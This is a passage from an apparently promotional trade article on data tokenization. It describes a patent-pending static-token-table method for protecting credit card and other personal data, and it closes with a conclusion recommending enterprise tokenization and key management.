This new patent-pending way to tokenize data 
eliminates the challenges associated with 
standard centralized tokenization and solves 
the issues described above with outsourcing. 
Particularly in high volume operations, the 
usual way of generating tokens is prone to 
issues that impact the availability and per- 
formance of the data. From a security stand- 
point, it is critical to address the issue of colli- 
sions caused when tokenization solutions as- 
sign the same token to two separate pieces of 
data. 
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This next generation tokenization solution ad- 
dresses all issues. System performance, 
availability and scaling are enhanced, numeric 
and alpha tokens are generated, key man- 
agement is greatly simplified, and collisions 
are eliminated. 

The benefits include scalability with multiple, 
parallel instances, dramatic high performance, 
highly available, centralized or distributed de- 
ployment, no token collisions and support of 
PCI and PI I data. 

A solution can provide easy export of the 
static token tables to remote Token Servers to 
support a distributed tokenization operation. 
The static token tables can easily be distrib- 
uted by using a simple file export to each To- 
ken Server. Each token table should be en- 
crypted throughout this export and import 
operation. 

Conclusion 

This new way to tokenize data eliminates 
challenges associated with standard central- 
ized tokenization, and has the potential to 
change where tokenization can be used. 

It is important to understand that data is 
stored to render follow-up checks, audits, and 
analysis. At the same time the information 
stored on the servers is a security risk, and 



needs to be protected. Even though the ex- 
amples discussed in this article are mostly 
concerned with credit card numbers, similar 
issues are encountered when handling social 
security numbers, driving license numbers or 
bank account numbers. Companies need to 
deploy an enterprise tokenization and key 
management solution to lock down various 
data across the enterprise. 

A holistic solution for data security should be 
based on a centralized data security man- 
agement that protect sensitive information 
from acquisition to deletion across the 
enterprise. 

Third party data security vendors develop so- 
lutions that protect data in the most cost effec- 
tive manner. External security technology 
specialists with deep expertise in data secu- 
rity techniques, encryption key management, 
and security policy in distributed environments 
are needed to find the most cost effective ap- 
proach for each organization. To maximize 
security with minimal business impact, high 
performance, transparent solution optimized 
for the dynamic enterprise will require a risk- 
adjusted approach to data security. This ap- 
proach will optimize the data security tech- 
niques that will be deployed on each system 
in the enterprise. 
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